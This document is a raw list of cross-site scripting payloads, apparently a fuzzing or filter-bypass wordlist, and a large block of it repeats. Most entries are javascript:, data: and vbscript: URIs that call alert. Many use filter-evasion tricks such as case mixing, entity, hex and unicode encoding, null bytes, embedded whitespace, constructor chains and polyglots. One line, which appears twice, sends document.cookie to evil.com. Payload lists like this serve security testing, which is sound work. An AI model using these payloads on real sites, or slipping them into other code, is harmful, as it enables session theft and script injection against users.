javascript:alert(42)
javascript:alert('Hacked!')
javascript:alert(document.body.innerHTML.length)
javascript:alert(navigator.platform)
javascript:alert(navigator.language)
javascript:alert(new Date())
javascript:alert(encodeURIComponent('XSS'))
javascript:alert(decodeURIComponent('%58%58%53'))
javascript:alert(btoa('XSS'))
javascript:alert(atob('WFNT'))
javascript:alert(document.forms.length)
javascript:alert(document.links.length)
javascript:alert(history.length)
javascript:alert(performance.now())
javascript:alert(JSON.stringify(navigator))
javascript:alert(document.URL)
javascript:alert(window.name)
javascript:alert(localStorage.length)
javascript:alert(sessionStorage.length)
javascript:alert(constructor.constructor('alert(1)')())
javascript:alert(String.fromCharCode(120,115,115))
javascript:alert('XSS'.toUpperCase())
javascript:alert(parseInt('1337'))
javascript:alert(Math.random())
javascript:alert(isNaN(1))
javascript:prompt('XSS', 'default')
javascript:confirm(document.domain)
javascript:alert('<!--XSS-->')
javascript:alert('"><script>alert(1)</script>')
javascript:alert(1)
javascript:alert('XSS')
javascript:alert(String.fromCharCode(88,83,83))
javascript:alert(document.domain)
javascript:alert(document.cookie)
javascript:alert(window.location)
javascript:alert(location.href)
javascript:alert(navigator.userAgent)
javascript:alert(top.location)
javascript:alert(parent.location)
javascript:confirm('XSS Test')
javascript:prompt('Enter data')
javascript:alert(document.title)
javascript:alert(screen.width+'x'+screen.height)
javascript:alert(atob('WFNT')) // XSS base64
javascript:alert(eval('1+1'))
javascript:alert(/XSS/.source)
javascript:alert(unescape('%58%58%53'))
javascript:alert(decodeURI('%58%58%53'))
javascript:alert(document.referrer)
javascript:alert(String.fromCharCode(88,83,83))
javascript:alert(unescape('%u0058%u0053%u0053'))
javascript:alert(unescape('%58%58%53'))
javascript:alert(decodeURI('%58%58%53'))
javascript:alert(decodeURIComponent('%58%58%53'))
javascript:alert(atob('WFNT'))
javascript:alert(atob('YWxlcnQoMSk='))
javascript:alert(btoa('XSS'))
javascript:alert(fromCharCode(88,83,83))
javascript:alert(%u003cscript%u003ealert(1)%u003c/script%u003e)
javascript:alert('XSS%00')
javascript:alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
javascript:alert(eval('al'+'ert(1)'))
javascript:alert(String.fromCharCode(97,108,101,114,116,40,49,41))
javascript:alert('\u0058\u0053\u0053')
javascript:alert('\x58\x53\x53')
javascript:alert('\u003csvg onload=alert(1)>')
javascript:alert('&#88;&#83;&#83;')
javascript:alert(decodeURIComponent('%c0%afjavascript:alert(1)'))
javascript:alert(String.fromCharCode(106,97,118,97,115,99,114,105,112,116,58,97,108,101,114,116,40,49,41))
javascript:alert(atob('YWxlcnQoWFNTKQ=='))
javascript:alert(fromCharCode(60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,41,62))
javascript:alert(1)
javascript:alert('XSS')
javascript://comment%0aalert(1)
javascript:void(alert(1))
javascript:window.onerror=alert;throw 1
JaVaScRiPt:alert(1)
javascript&#58;alert(1)
javascript&#x3A;alert(1)
java\u0000script:alert(1)
javascript\x3Aalert(1)
 javascript:alert(1)
javascript :alert(1)
\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74:alert(1)
javascript:alert(String.fromCharCode(88,83,83))
javascript:alert(atob('WFNT'))
javascript:alert(unescape('%58%58%53'))
javascript:alert(decodeURI('%58%58%53'))
javascript:alert(decodeURIComponent('%58%58%53'))
javascript:alert('\\u0058\\u0053\\u0053')
javascript:alert('\\x58\\x53\\x53')
javascript:alert('&#88;&#83;&#83;')
javascript:eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29')
javascript:eval(atob('YWxlcnQoMSk='))
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;charset=utf-8,<script>alert(1)</script>
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:,<script>alert(1)</script>
data:text/html,<svg onload=alert(1)>
data:image/svg+xml,<svg onload=alert(1)>
vbscript:msgbox(1)
vbscript:Execute(\"msgbox(1)\")
VBsCrIpT:msgbox(1)
javascript:constructor.constructor('alert(1)')()
javascript:[]['constructor']['constructor']('alert(1)')()
javascript:Function('alert(1)')()
javascript:(()=>alert(1))()
javascript:eval('al'+'ert(1)')
javascript:setTimeout('alert(1)',0)
javascript:setInterval('alert(1)',0)
javascript:new Function('alert(1)')()
javascript:document.body.onload=alert(1)
javascript:document.body.onclick=()=>alert(1)
javascript:window.onload=()=>alert(1)
javascript:document.addEventListener('click',()=>alert(1))
j\\u0061vascript:alert(1)
\\u006aavascript:alert(1)
javas\\u0063ript:alert(1)
javasc\\u0072ipt:alert(1)
\\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074:alert(1)
javascript:alert(1)%00
java\\x00script:alert(1)
javascript\\x00:alert(1)
javascript:alert(1)\\x00
j%61vascript:alert(1)
javascrip%74:alert(1)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)
\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74:alert(1)
JAVASCRIPT:alert(1)
JavaScript:alert(1)
jAvAsCrIpT:alert(1)
JaVaScRiPt:AlErT(1)
javascript:document.location='http://evil.com?c='+document.cookie
javascript:document.write('<img src=x onerror=alert(1)>')
javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'
javascript:eval(location.hash.slice(1))
javascript:eval(window.name)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'
jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
java\\x09script:alert(1)
java\\x0ascript:alert(1)
java\\x0dscript:alert(1)
java\\x20script:alert(1)
java\tscript:alert(1)
java\nscript:alert(1)
java\rscript:alert(1)
javascript:/**/alert(1)
javascript://\nalert(1)
javascript:javascript:/*comment*/alert(1)/*comment*/
javascript:window['alert'](1)
javascript:self['alert'](1)
javascript:top['alert'](1)
javascript:parent['alert'](1)
javascript:frames['alert'](1)
javascript:this['alert'](1)
javascript:globalThis['alert'](1)
javascript:alert`1`
javascript:`${alert(1)}`
javascript:eval`alert\\x281\\x29`
javascript:alert(/XSS/.source)
javascript:alert(/[]/['constructor']['constructor']('alert(1)')())
javascript:(1,eval)('alert(1)')
javascript:[].constructor.constructor('alert(1)')()
javascript:''.constructor.constructor('alert(1)')()
javascript:try{throw onerror=alert,'1'}catch(e){eval(e)}
javascript:window.onerror=eval;throw'=alert\\x281\\x29'
javascript:alert(%2561)
javascript:%61lert(1)
javascript:ale%72t(1)
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
javascript:alert(1)?javascript:alert(2)
javascript:alert(1)
javascript:alert('XSS')
javascript://comment%0aalert(1)
javascript:void(alert(1))
javascript:window.onerror=alert;throw 1
JaVaScRiPt:alert(1)
javascript&#58;alert(1)
javascript&#x3A;alert(1)
java\u0000script:alert(1)
javascript\x3Aalert(1)
 javascript:alert(1)
javascript :alert(1)
\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74:alert(1)
javascript:alert(String.fromCharCode(88,83,83))
javascript:alert(atob('WFNT'))
javascript:alert(unescape('%58%58%53'))
javascript:alert(decodeURI('%58%58%53'))
javascript:alert(decodeURIComponent('%58%58%53'))
javascript:alert('\\u0058\\u0053\\u0053')
javascript:alert('\\x58\\x53\\x53')
javascript:alert('&#88;&#83;&#83;')
javascript:eval('\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29')
javascript:eval(atob('YWxlcnQoMSk='))
javascript:eval(String.fromCharCode(97,108,101,114,116,40,49,41))
data:text/html,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
data:text/html;charset=utf-8,<script>alert(1)</script>
data:text/html,%3Cscript%3Ealert(1)%3C/script%3E
data:,<script>alert(1)</script>
data:text/html,<svg onload=alert(1)>
data:image/svg+xml,<svg onload=alert(1)>
vbscript:msgbox(1)
vbscript:Execute(\"msgbox(1)\")
VBsCrIpT:msgbox(1)
javascript:constructor.constructor('alert(1)')()
javascript:[]['constructor']['constructor']('alert(1)')()
javascript:Function('alert(1)')()
javascript:(()=>alert(1))()
javascript:eval('al'+'ert(1)')
javascript:setTimeout('alert(1)',0)
javascript:setInterval('alert(1)',0)
javascript:new Function('alert(1)')()
javascript:document.body.onload=alert(1)
javascript:document.body.onclick=()=>alert(1)
javascript:window.onload=()=>alert(1)
javascript:document.addEventListener('click',()=>alert(1))
j\\u0061vascript:alert(1)
\\u006aavascript:alert(1)
javas\\u0063ript:alert(1)
javasc\\u0072ipt:alert(1)
\\u006A\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074:alert(1)
javascript:alert(1)%00
java\\x00script:alert(1)
javascript\\x00:alert(1)
javascript:alert(1)\\x00
j%61vascript:alert(1)
javascrip%74:alert(1)
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)
\\x6a\\x61\\x76\\x61\\x73\\x63\\x72\\x69\\x70\\x74:alert(1)
JAVASCRIPT:alert(1)
JavaScript:alert(1)
jAvAsCrIpT:alert(1)
JaVaScRiPt:AlErT(1)
javascript:document.location='http://evil.com?c='+document.cookie
javascript:document.write('<img src=x onerror=alert(1)>')
javascript:document.body.innerHTML='<img src=x onerror=alert(1)>'
javascript:eval(location.hash.slice(1))
javascript:eval(window.name)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'
jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e
java\\x09script:alert(1)
java\\x0ascript:alert(1)
java\\x0dscript:alert(1)
java\\x20script:alert(1)
java\tscript:alert(1)
java\nscript:alert(1)
java\rscript:alert(1)
javascript:/**/alert(1)
javascript://\nalert(1)
javascript:javascript:/*comment*/alert(1)/*comment*/
javascript:window['alert'](1)
javascript:self['alert'](1)
javascript:top['alert'](1)
javascript:parent['alert'](1)
javascript:frames['alert'](1)
javascript:this['alert'](1)
javascript:globalThis['alert'](1)
javascript:alert`1`
javascript:`${alert(1)}`
javascript:eval`alert\\x281\\x29`
javascript:alert(/XSS/.source)
javascript:alert(/[]/['constructor']['constructor']('alert(1)')())
javascript:(1,eval)('alert(1)')
javascript:[].constructor.constructor('alert(1)')()
javascript:''.constructor.constructor('alert(1)')()
javascript:try{throw onerror=alert,'1'}catch(e){eval(e)}
javascript:window.onerror=eval;throw'=alert\\x281\\x29'
javascript:alert(%2561)
javascript:%61lert(1)
javascript:ale%72t(1)
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
javascript:alert(1)?javascript:alert(2)